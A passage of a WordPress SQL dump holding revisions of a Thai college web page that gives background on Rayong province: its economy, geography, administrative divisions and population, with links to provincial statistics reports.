href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B8%9B%E0%B8%B5%202554.pdf\">ปีงบประมาณ 2554 </a> </strong>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 20:32:46', '2018-01-29 13:32:46', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(844, 3, '2018-01-29 20:41:27', '2018-01-29 13:41:27', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h2 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h2>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/vision%20in%20rayong%202554(news).pdf\">บรรยายสรุปจังหวัดระยอง</a></h4>\r\n</div>\r\n<h3><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h3>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง </strong><strong>ปีงบประมาณ 2555 </strong><strong> <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88_%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%202555.pdf\">เดือนตุลาคม</a></strong>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B8%9B%E0%B8%B5%202554.pdf\">ปีงบประมาณ 2554 </a> </strong>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 20:41:27', '2018-01-29 13:41:27', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(845, 3, '2018-01-29 20:45:04', '2018-01-29 13:45:04', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span 